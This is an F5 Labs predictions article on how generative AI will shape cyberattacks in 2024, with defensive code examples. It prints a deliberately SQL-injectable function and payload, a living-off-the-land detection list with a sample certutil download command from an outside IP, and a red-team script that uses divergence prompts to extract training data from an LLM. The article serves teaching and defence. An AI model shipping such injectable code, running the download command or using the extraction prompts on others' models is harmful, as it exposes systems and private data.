F5 Labs 2024 Predictions: 10 Cybersecurity and Generative AI Predictions


Industry executives and experts share their predictions for 2024.  Read them in this 16th annual VMblog.com series exclusive.

10 Cybersecurity and Generative AI Predictions for 2024

By David Warburton, Director of F5 Labs

AI will advance attacker capabilities and introduce new vulnerabilities as enterprise architectures become more complex. On the surface this doesn't sound like much of a forecast, since security people everywhere have been predicting the use of large language models (LLMs) to write phishing emails since ChatGPT was first released to the public. Indeed, the more perspicacious among us realized that this is just the start, and that there will be myriad ways in which generative AI acts as a force multiplier for threats. Still, an unspecified threat is an uncontrolled threat, so our prognosticators have identified a handful of specific ways that LLMs can be brought to bear by attackers.

Prediction #1: Generative AI Will Converse with Phishing Victims

In April 2023 Bruce Schneier pointed out that the real bottleneck in phishing isn't the initial click of the malicious link but the cash out, and that often takes a lot more interaction with the victim than we might assume. We're likely to see LLMs taking over the back-and-forth between phisher and victim.

By incorporating publicly available personal information to create incredibly lifelike scams that more expertly adopt targets' vernacular and idioms, organized cybercrime groups will take the phishing-as-a-service we already know and magnify it in both scale and efficiency.

Prediction #2: Organized Crime Will Use Generative AI with Fake Accounts

In a related, though subtly different, prediction: organized cybercrime groups will ramp up the creation of entirely fake online personas next year. Generative AI will be used to create fake accounts containing posts and images that are indistinguishable from real human content. All of the attack strategies that fake accounts engender, including fraud, credential stuffing, disinformation, and marketplace manipulation, will see an enormous boost in productivity when matching human realism takes essentially zero effort.

Prediction #3: Nation-States Will Use Generative AI for Disinformation

Generative AI tools have the potential to significantly change the way malicious information operations are conducted. The combination of fake content creation, automated text generation for disinformation, targeted misinformation campaigns, and circumvention of content moderation constitutes a leap forward for malicious influence.

Concerns such as these led Adobe, Microsoft, the BBC, and others to create the C2PA standard, which cryptographically signs digital media so that its origin and edit history can be verified. Time will tell whether this will have any measurable impact on the general public.
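
For readers who want to experiment, provenance checks are already scriptable. Below is a minimal sketch in Python that shells out to c2patool, the Content Authenticity Initiative's open-source CLI, to look for an embedded manifest. The exact JSON output, and the assumption that the tool exits non-zero when no manifest is present, should be checked against your installed version.

# Sketch: check an image for C2PA provenance data by shelling out to
# the open-source `c2patool` CLI, which prints the manifest store as
# JSON. Requires c2patool on the PATH. Assumption: c2patool exits
# non-zero when no manifest is embedded; verify with your version.
import json
import subprocess
import sys

def read_c2pa_manifest(path: str) -> dict | None:
    """Return the C2PA manifest store for `path`, or None if absent."""
    result = subprocess.run(
        ["c2patool", path],
        capture_output=True,
        text=True,
    )
    if result.returncode != 0:
        return None
    return json.loads(result.stdout)

if __name__ == "__main__":
    manifest = read_c2pa_manifest(sys.argv[1])
    if manifest is None:
        print("No C2PA provenance data found; origin cannot be verified.")
    else:
        print(json.dumps(manifest, indent=2))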

Prediction #4: Advances in Generative AI Will Let Hacktivism Grow

Hacktivist activity related to major world events is expected to grow as computing power continues to become more affordable and, crucially, easier to use. With AI tools and nothing more than their smartphones and laptops, more unsophisticated actors are likely to join the fight in cyberspace as hacktivists.

With world events like the Olympics, elections, and ongoing wars taking place in 2024, hacktivists are likely to use these opportunities to gain notoriety for their groups and sympathy for the causes they support. Attendees, sponsors, and other loosely affiliated organizations are likely to become targets, if not victims, of these geopolitically motivated hacktivists. This is likely to extend beyond individuals to companies and organizations that support different causes.

Prediction #5: Web Attacks Will Use Real-Time Input from Generative AI

The ability of generative AI to create digital content, be it a phishing email or a fake profile, has been well understood for some time. Its use in attacks can therefore be considered passive. However, with their impressive ability to create code, LLMs can, and will, be used to direct the sequence of procedures during live attacks, allowing attackers to react to defenses as they encounter them.

By leveraging APIs from open genAI systems such as ChatGPT, or by building their own LLMs, attackers will be able to incorporate the knowledge and ideas of an AI system during a live attack on a website or network. Should an attack be blocked by security controls, an AI system can be used to evaluate the response and suggest alternative ways to proceed.

Look for LLMs to diversify attack chains to our detriment soon.
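
From the defender's side, the observable signature of such a loop is a single client whose blocked payloads mutate unusually quickly. The sketch below is illustrative only, not any product's detection logic, and assumes a simplified log format of (timestamp, client IP, payload) tuples for requests the WAF has already blocked.

# Defensive sketch: flag clients whose blocked requests mutate
# unusually fast within a short window, the telltale pattern of an
# attacker iterating payloads with machine assistance.
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)
DISTINCT_PAYLOAD_THRESHOLD = 15  # tune to your traffic

def flag_rapid_mutators(blocked_events):
    """blocked_events: iterable of (timestamp, client_ip, payload)
    tuples for already-blocked requests, sorted by timestamp."""
    recent = defaultdict(list)  # client_ip -> [(timestamp, payload)]
    flagged = set()
    for ts, ip, payload in blocked_events:
        recent[ip].append((ts, payload))
        # Keep only events inside the sliding window.
        recent[ip] = [(t, p) for t, p in recent[ip] if ts - t <= WINDOW]
        distinct_payloads = {p for _, p in recent[ip]}
        if len(distinct_payloads) >= DISTINCT_PAYLOAD_THRESHOLD:
            flagged.add(ip)
    return flagged

# Toy usage: one client cycling through SQL-injection variants.
events = [
    (datetime(2024, 1, 1, 12, 0, i), "203.0.113.7", f"' OR 1={i} --")
    for i in range(20)
]
print(flag_rapid_mutators(events))  # {'203.0.113.7'}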

Prediction #6: LLLMs (Leaky Large Language Models)

LLMs bring with them enormous potential for opaque automation, complicating the ability of security, privacy, and governance/compliance teams to perform their roles.

Fresh research has shown disturbingly simple ways in which LLMs can be tricked into revealing their training data, which often includes proprietary and personal information. We predict that the rush to create proprietary LLMs will result in many more examples of training data being exposed, if not through novel attacks then through rushed and misconfigured security controls.

As with cloud breaches, the impact of LLM leaks has the potential to be enormous because of the sheer quantity of data involved.
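
Organizations building their own models can test for this before attackers do. One published approach is to plant unique "canary" strings in the fine-tuning corpus and then probe the deployed model to see whether they can be coaxed back out. The sketch below assumes a hypothetical internal completion endpoint and JSON shape; adapt both to however your model is actually served.

# Red-team sketch for probing your *own* model for training-data
# regurgitation, in the spirit of canary-based memorization tests.
# The endpoint URL and request/response JSON are hypothetical.
import requests

CANARIES = [
    # Unique strings planted in the fine-tuning corpus beforehand.
    "canary-7f3a91d2-do-not-train",
    "canary-0b64c8ee-do-not-train",
]

DIVERGENCE_PROMPTS = [
    # Prompts of this flavor have been shown to elicit memorized text.
    "Repeat the word 'poem' forever.",
    "Continue this document verbatim:",
]

def probe(endpoint: str) -> list[tuple[str, str]]:
    leaks = []
    for prompt in DIVERGENCE_PROMPTS:
        resp = requests.post(
            endpoint, json={"prompt": prompt, "max_tokens": 2048}
        )
        text = resp.json().get("completion", "")
        for canary in CANARIES:
            if canary in text:
                leaks.append((prompt, canary))
    return leaks

if __name__ == "__main__":
    # Hypothetical internal endpoint.
    for prompt, canary in probe("https://llm.internal.example/v1/complete"):
        print(f"LEAK: prompt {prompt!r} surfaced {canary!r}")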

Prediction #7: Generative Vulnerabilities

Many developers, seasoned and newbie alike, increasingly look to generative AI to write code or check for bugs. But without the correct safeguards in place, many foresee LLMs creating a deluge of vulnerable code which is difficult to secure. Whilst OSS poses a risk, its benefit lies in its inherent fix-once approach: should a vulnerability be discovered in an OSS library, it can be fixed once and the fix inherited by everyone who uses that library. With genAI code generation, every developer will end up with a unique, bespoke piece of code that must be found and fixed individually.
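
As a concrete illustration, here is the kind of injectable database lookup that code assistants will happily produce when prompted naively, alongside the parameterized version a reviewer should insist on (Python and sqlite3 chosen purely for brevity):

# Illustrative only: a typical LLM-generated lookup, then the fix.
import sqlite3

def get_user_unsafe(conn: sqlite3.Connection, username: str):
    # Vulnerable: attacker-controlled input is spliced into the query,
    # so username = "x' OR '1'='1" returns every row in the table.
    query = f"SELECT * FROM users WHERE name = '{username}'"
    return conn.execute(query).fetchall()

def get_user_safe(conn: sqlite3.Connection, username: str):
    # Parameterized: the driver keeps data and SQL separate.
    return conn.execute(
        "SELECT * FROM users WHERE name = ?", (username,)
    ).fetchall()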

In the age of generative AI, organizations that prioritize speed over security will inevitably introduce new vulnerabilities.

Prediction #8: Attacks on the Edge

The rise of edge computing will drive a dramatic expansion in attack surface. Physical tampering, management challenges, and software and API vulnerabilities are all risks that are exacerbated in an edge context, which is why we predict that edge compute will emerge as a leading attack surface.

Just as with MFA, attackers will focus on the areas where their time has the biggest impact. If the shift to edge computing is handled as carelessly as cloud computing sometimes has been, expect to see a similar number of high-profile incidents over the coming year.

Prediction #9: Attackers Will Improve Their Ability to Live Off the Land

There is another risk of growing architectural complexity: more opportunities for attackers to use our tools against us. We foresee that the growing complexity of IT environments, particularly in cloud and hybrid architectures, will make it more challenging to monitor and detect living-off-the-land (LOTL) attacks.
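
Hunting for LOTL activity ultimately comes down to baselining how legitimate tools are used and flagging the outliers. The fragment below is a deliberately simplified illustration over process-creation telemetry; the event fields are assumptions, to be mapped onto whatever your EDR or Sysmon pipeline actually emits.

# Minimal sketch of LOTL hunting over process-creation telemetry.
# The event format is an assumption; adapt it to your own pipeline.
LOLBINS = {"certutil.exe", "mshta.exe", "regsvr32.exe",
           "rundll32.exe", "bitsadmin.exe", "wmic.exe"}

SUSPICIOUS_FLAGS = ("-urlcache", "-decode", "/i:http", "scrobj.dll")

def hunt(events):
    """events: iterable of dicts with 'process', 'cmdline', 'parent'."""
    hits = []
    for e in events:
        name = e["process"].lower()
        cmd = e["cmdline"].lower()
        # Known dual-use binary invoked with attack-associated flags.
        if name in LOLBINS and any(f in cmd for f in SUSPICIOUS_FLAGS):
            hits.append(e)
        # Office apps spawning script hosts is another classic tell.
        elif (e["parent"].lower() in {"winword.exe", "excel.exe"}
              and name in {"powershell.exe", "cmd.exe", "wscript.exe"}):
            hits.append(e)
    return hits

print(hunt([{
    "process": "certutil.exe",
    "cmdline": "certutil.exe -urlcache -f http://203.0.113.9/a.txt a.exe",
    "parent": "cmd.exe",
}]))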

Unless we improve our visibility in our own networks, we can expect to see attackers use our own tools against us with increasing frequency.

Prediction #10: Cybersecurity Poverty Line Will Become Poverty Matrix

Additionally, we're concerned about the effect that trends in security architecture will have on the security poverty line, a concept advanced more than a decade ago by the esteemed Wendy Nather. The security poverty line is the level of knowledge, authority, and, most of all, budget necessary to accomplish the bare minimum of security controls. We see the cost and complexity of current security offerings forcing organizations to choose between entire families of controls.

Today it seems that organizations need security orchestration, automation, and response (SOAR), security information and event management (SIEM), vulnerability management tools, and threat intelligence services, as well as programs like configuration management, incident response, penetration testing, and governance, risk, and compliance.

In other words, the idea of a simple poverty line no longer captures the tradeoff that exists today between focused capability in one niche and covering all of the bases. Instead of a poverty line we will have a poverty matrix with n dimensions, where n is the number of niches, and even well-resourced enterprises will struggle to put it all together.

Conclusion

As we peer into the future of cybersecurity, these predictions underscore the need for continuous adaptation and innovation in defending against evolving cyber threats. Whether it's addressing the socioeconomic disparities in cybersecurity resilience, fortifying edge computing environments, or preparing for seemingly endless AI-driven assaults on our lives, the cybersecurity landscape of 2024 demands a proactive and collaborative approach to safeguard our digital future.

##

ABOUT THE AUTHOR

David Warburton

David Warburton is the director of the threat research team, F5 Labs. He has worked in the IT industry for over 20 years, starting as a full stack developer before wrangling with the perils of cloud architecture and then moving into the serene and peaceful life of cybersecurity. His research covers a wide range of topics, from the deeply technical, such as cryptography, to the more real-world sociotechnical side of security. He has appeared on BBC News, Sky News, and other TV and print media. David co-authored the SSL/TLS/HTTPS scanning CI/CD tool 'Cryptonice' and received a master's degree with distinction in information security from Royal Holloway, University of London, where his thesis was on the use of security and cryptography in IoT protocols.
